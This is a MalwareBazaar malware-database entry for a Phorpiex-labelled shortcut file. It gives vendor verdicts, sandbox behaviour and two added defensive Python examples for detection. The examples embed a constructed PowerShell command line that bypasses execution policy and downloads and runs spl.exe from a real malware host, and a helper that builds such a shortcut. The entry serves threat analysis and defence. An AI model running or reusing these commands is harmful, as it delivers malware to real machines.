MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Threat: unknown (MalwareBazaar's own classification; one vendor result below labels the sample Shortcut.Trojan.PhorpiexLNK)
Vendor detections: 9

SHA256 hash: 7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0
SHA3-384 hash: ff99c9955ddeae23de0ebcf36c220d53db12fa1b8d6ab0680ee358bd5797dcdfbe817f0d445eefdfbcba682c4ad02865
SHA1 hash: 96aadee715463c50cf22c0a93b5fe1532a058d5c
MD5 hash: 98b1b442429c084ac8301af4638ea18d
humanhash: red-triple-sixteen-eighteen
File name: Document.doc.lnk
File size: 1,991 bytes
First seen: 2024-03-28 09:31:15 UTC
Last seen: Never
File type: Shortcut (lnk)
MIME type: application/octet-stream
ssdeep: 24:8xfJcECTZWiAU6SyLRerUMkWI9wCc5zTS9Zm:8xi4BMyLRerHyEO9Z
TLSH: T16B41D0221BC70364E2F58A399C7AE7419D657C1AEA078E5D0185D78C1C60614EC75F3D
Reporter: cocaman
Tags: lnk

Intelligence

File Origin
# of uploads: 1
# of downloads: 181
Origin country: CH
Vendor Threat Intelligence

Result
Verdict: Malicious
File Type: LNK File - Malicious
Payload URL: http://twizt.net/spl.exe (extracted from the LNK file)
Behaviour: BlacklistAPI detected

Result
Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: cmd dropper lolbin masquerade powershell shell32

Result
Verdict: Malicious
Labeled as: Trojan.PowerShell.LNK.Generic.6; BZC.YAX.Boxter.251
Result
Verdict: MALICIOUS

Result
Threat name:
Detection: malicious
Classification: rans.troj.evad
Score: 100 / 100
Signatures:
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Drops PE files to the user root directory
Found evasive API chain (may stop execution after checking mutex)
Found URL in windows shortcut file (LNK)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Machine Learning detection for dropped file
Machine Learning detection for sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Powershell drops PE file
Sigma detected: Powershell download and execute file
Sigma detected: PowerShell DownloadFile
Snort IDS alert for network traffic
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Uses an obfuscated file name to hide its real file extension (double extension)
Windows shortcut file (LNK) contains suspicious command line arguments
Windows shortcut file (LNK) starts blacklisted processes
Yara detected malicious lnk
Behaviour

Behaviour graph (ID 1416951; sample Document.doc.lnk; start date 28/03/2024; architecture WINDOWS; score 100)

Network: twizt.net (185.215.113.66, WHOLESALECONNECTIONSNL, Portugal), contacted by powershell.exe; connections 49706, 49707, 49708
Sample-level signatures: Snort IDS alert for network traffic; Multi AV Scanner detection for domain / URL; Antivirus detection for URL or domain; 10 other signatures

Process tree:
cmd.exe (launched by the shortcut)
    signatures: Windows shortcut file (LNK) starts blacklisted processes; Suspicious powershell command line found; Tries to download and execute files (via powershell); Bypasses PowerShell execution policy
    conhost.exe
    powershell.exe
        network: twizt.net 185.215.113.66
        dropped: C:\Users\user\windrv.exe (PE32)
        signatures: Drops PE files to the user root directory; Powershell drops PE file
        windrv.exe
            dropped: C:\Users\user\winsvc.exe (PE32)
            signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); Machine Learning detection for dropped file; 2 other signatures
            winsvc.exe
                signatures: Multi AV Scanner detection for dropped file; Found evasive API chain (may stop execution after checking mutex); Machine Learning detection for dropped file; Hides that the sample has been downloaded from the Internet (zone.identifier)
winsvc.exe (two further instances started outside the chain above)
Result
Threat name: Shortcut.Trojan.PhorpiexLNK
Status: Malicious
First seen: 2024-03-28 07:38:25 UTC
File Type: Binary
AV detection: 14 of 23 (60.87%)
Threat level: 5/5

Result
Malware family: n/a
Score: 10/10
Tags: persistence
Behaviour:
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Enumerates physical storage devices
Adds Run key to start application
Checks computer location settings
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Downloads MZ/PE file
Malware Config
Dropper Extraction: http://twizt.net/spl.exe
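The chain the behaviour graph and the vendor behaviour list above describe (cmd.exe started by the shortcut, PowerShell downloading spl.exe with the execution policy bypassed, a PE dropped to the profile root and executed, a second stage dropped and a Run key added) can be turned into correlation logic over endpoint telemetry. The following is an added example, not MalwareBazaar's or any vendor's code: the events are constructed Sysmon-style records that mirror the reported chain (the PIDs, the user SID, the Run value name and the exact command lines are assumptions, since the page shows none of them), and the rules are generic, not the vendors' signatures.

```python
"""Correlation of the reported chain (shortcut -> cmd -> powershell download ->
PE dropped to the profile root -> dropped EXE executed -> Run key) over
Sysmon-style process, file and registry events. Added example."""
import re

CMD = r"C:\Windows\System32\cmd.exe"
EXPLORER = r"C:\Windows\explorer.exe"
POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
WINDRV = r"C:\Users\user\windrv.exe"      # first stage, path from the report
WINSVC = r"C:\Users\user\winsvc.exe"      # second stage, path from the report
RUN_KEY = (r"HKU\S-1-5-21-1111111111-2222222222-3333333333-1001"
           r"\Software\Microsoft\Windows\CurrentVersion\Run\winsvc")  # constructed

# Constructed Sysmon-style events (id 1 = process create, 11 = file create,
# 13 = registry value set). PIDs, SID, value name and command lines are
# assumptions; only the process names, paths and URL come from the report.
EVENTS = [
    {"id": 1, "pid": 1880, "ppid": 1244, "image": CMD, "parent": EXPLORER,
     "cmdline": "cmd.exe /c powershell -ExecutionPolicy Bypass -w hidden -c "
                "\"(New-Object Net.WebClient).DownloadFile('http://twizt.net/spl.exe',"
                "'C:\\Users\\user\\windrv.exe'); Start-Process C:\\Users\\user\\windrv.exe\""},
    {"id": 1, "pid": 2044, "ppid": 1880, "image": POWERSHELL, "parent": CMD,
     "cmdline": "powershell -ExecutionPolicy Bypass -w hidden -c "
                "\"(New-Object Net.WebClient).DownloadFile('http://twizt.net/spl.exe',"
                "'C:\\Users\\user\\windrv.exe'); Start-Process C:\\Users\\user\\windrv.exe\""},
    {"id": 11, "pid": 2044, "image": POWERSHELL, "target": WINDRV},
    {"id": 1, "pid": 2208, "ppid": 2044, "image": WINDRV, "parent": POWERSHELL,
     "cmdline": WINDRV},
    {"id": 11, "pid": 2208, "image": WINDRV, "target": WINSVC},
    {"id": 1, "pid": 2300, "ppid": 2208, "image": WINSVC, "parent": WINDRV,
     "cmdline": WINSVC},
    {"id": 13, "pid": 2300, "image": WINSVC, "target": RUN_KEY, "details": WINSVC},
]

USER_ROOT_EXE = re.compile(r"^[a-z]:\\users\\[^\\]+\\[^\\]+\.exe$", re.I)
RUN_PATH = re.compile(r"\\software\\microsoft\\windows\\currentversion\\run\\", re.I)
PS_DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|net\.webclient", re.I)
PS_BYPASS = re.compile(r"-e(p|xecutionpolicy)?\s+bypass", re.I)


def correlate(events: list) -> list:
    """Return (rule, pid) alerts; stateful so later stages are tied to earlier ones."""
    alerts = []
    chain = set()    # pids attributed to the infection chain
    dropped = set()  # lower-cased paths written by a chain process
    for e in events:
        image = e["image"].lower()
        if e["id"] == 1:
            cmdline = e["cmdline"]
            # The shortcut itself is invisible in process telemetry; explorer.exe
            # spawning cmd.exe that immediately calls powershell is the proxy
            # for "Windows shortcut file (LNK) starts blacklisted processes".
            if (image.endswith("\\cmd.exe")
                    and e["parent"].lower().endswith("\\explorer.exe")
                    and "powershell" in cmdline.lower()):
                alerts.append(("explorer_cmd_spawns_powershell", e["pid"]))
                chain.add(e["pid"])
            if image.endswith("\\powershell.exe") and PS_DOWNLOAD.search(cmdline):
                alerts.append(("powershell_download_execute", e["pid"]))
                if PS_BYPASS.search(cmdline):
                    alerts.append(("executionpolicy_bypass", e["pid"]))
                chain.add(e["pid"])
            if image in dropped:
                alerts.append(("dropped_exe_executed", e["pid"]))
                chain.add(e["pid"])
            elif e["ppid"] in chain:
                chain.add(e["pid"])
        elif e["id"] == 11:
            # File-create events carry no content, so "PE" here means the
            # .exe extension; the sandbox checked the file itself (PE32).
            if e["pid"] in chain and USER_ROOT_EXE.match(e["target"]):
                alerts.append(("exe_dropped_to_user_root", e["pid"]))
                dropped.add(e["target"].lower())
        elif e["id"] == 13:
            if RUN_PATH.search(e["target"]) and e["details"].lower() in dropped:
                alerts.append(("run_key_to_dropped_exe", e["pid"]))
    return alerts


if __name__ == "__main__":
    for rule, pid in correlate(EVENTS):
        print(f"{rule:32} pid={pid}")
```

The correlation is deliberately stateful: "dropped EXE executed" and "Run key points at dropped EXE" only fire for files that a process already in the chain wrote, which is what separates this pattern from a user legitimately installing software into their profile.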

YARA Signatures


MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name: Download_in_LNK
Author: @bartblaze
Description: Identifies download artefacts in shortcut (LNK) files.

Rule name: Execution_in_LNK
Author: @bartblaze
Description: Identifies execution artefacts in shortcut (LNK) files.

Rule name: EXE_in_LNK
Author: @bartblaze
Description: Identifies executable artefacts in shortcut (LNK) files.

Rule name: PS_in_LNK
Author: @bartblaze
Description: Identifies PowerShell artefacts in shortcut (LNK) files.

Rule name: SUSP_LNK_CMD
Author: SECUINFRA Falcon Team
Description: Detects the reference to cmd.exe inside an lnk file, which is suspicious

Rule name: SUSP_LNK_PowerShell
Author: SECUINFRA Falcon Team
Description: Detects the reference to powershell inside an lnk file, which is suspicious

Rule name: SUSP_LNK_SuspiciousCommands
Author: Florian Roth (Nextron Systems)
Description: Detects LNK file with suspicious content
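The rules listed above all key on the StringData of the shortcut (target path, working directory, command-line arguments). The following added example (not MalwareBazaar's, the rule authors' or any vendor's code) parses those fields from a Shell Link file according to MS-SHLLINK and flags the same indicators the reports above name: cmd.exe and PowerShell references, a download URL, an executable, an execution-policy bypass and a double extension in the file name. The LNK it inspects is constructed inside the block to mirror the reported behaviour, because the page does not show the sample's actual command line; the target path and the PowerShell one-liner are assumptions.

```python
"""Minimal MS-SHLLINK parser: extracts the StringData fields the YARA rules
key on and flags the LNK indicators named in the reports. Added example."""
import re
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))


def parse_lnk(data: bytes) -> dict:
    """Return the StringData fields of a Shell Link file keyed by field name."""
    if (len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                   # end of the ShellLinkHeader
    if flags & HAS_IDLIST:                     # IDListSize (2 bytes) + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINKINFO:                   # LinkInfoSize includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {}
    for flag, name in STRING_FIELDS:           # fixed order per the spec
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, pos)[0]   # CountCharacters
        pos += 2
        if flags & IS_UNICODE:
            fields[name] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[name] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def lnk_indicators(fields: dict, file_name: str) -> list:
    """Indicators mirroring the YARA rules and sandbox signatures above."""
    text = " ".join(fields.get(k, "") for k in
                    ("relative_path", "working_dir", "arguments", "icon_location"))
    low = text.lower()
    hits = []
    if re.search(r"\bcmd(\.exe|\s)", low):
        hits.append("cmd_in_lnk")                              # SUSP_LNK_CMD
    if "powershell" in low:
        hits.append("powershell_in_lnk")                       # PS_in_LNK
    if re.search(r"https?://", low):
        hits.append("download_url_in_lnk")                     # Download_in_LNK
    if ".exe" in low:
        hits.append("exe_in_lnk")                              # EXE_in_LNK
    if re.search(r"-e(p|xecutionpolicy)?\s+bypass", low):
        hits.append("executionpolicy_bypass")
    if re.search(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b", low):
        hits.append("download_cmdlet")
    if re.search(r"\.(doc|docx|pdf|xls|xlsx|txt|jpg|png)\.lnk$", file_name.lower()):
        hits.append("double_extension")                        # e.g. Document.doc.lnk
    return hits


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Constructed LNK for the demo: header, three Unicode strings, terminal block."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIqqqIIIHHII", 0x4C, LNK_CLSID, flags,
                         0x20,            # FILE_ATTRIBUTE_ARCHIVE
                         0, 0, 0,         # creation / access / write time
                         0, 0,            # FileSize, IconIndex
                         7,               # ShowCommand SW_SHOWMINNOACTIVE (window hidden)
                         0, 0, 0, 0)      # HotKey, Reserved1, Reserved2, Reserved3
    body = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le")
                    for s in (relative_path, working_dir, arguments))
    return header + body + b"\x00\x00\x00\x00"   # TerminalBlock


# Constructed sample: the command line is an assumption that mirrors the
# reported behaviour (cmd -> powershell, policy bypass, download to the
# profile root, execute); it is not the real sample's argument string.
SAMPLE_NAME = "Document.doc.lnk"
SAMPLE_LNK = build_lnk(
    r"..\..\..\Windows\System32\cmd.exe",
    r"C:\Windows\System32",
    "/c powershell -ExecutionPolicy Bypass -w hidden -c \"(New-Object Net.WebClient)"
    ".DownloadFile('http://twizt.net/spl.exe','$env:USERPROFILE\\windrv.exe');"
    " Start-Process $env:USERPROFILE\\windrv.exe\"",
)

if __name__ == "__main__":
    fields = parse_lnk(SAMPLE_LNK)
    for name, value in fields.items():
        print(f"{name:14}: {value}")
    print("indicators:", ", ".join(lnk_indicators(fields, SAMPLE_NAME)))
```

Note that a shortcut to any ordinary program trips EXE_in_LNK on its own; the signal in this entry comes from the combination (cmd and PowerShell references, a URL, a download cmdlet and an execution-policy bypass in one shortcut, plus the double extension), which is how the sandbox verdicts above are built up.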

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Malspam: Shortcut (lnk) 7b741ba5f5bfe5a6045f1f19e03f412226c7edb42c6c94a5a92922515da89aa0 (this sample)
Delivery method: Other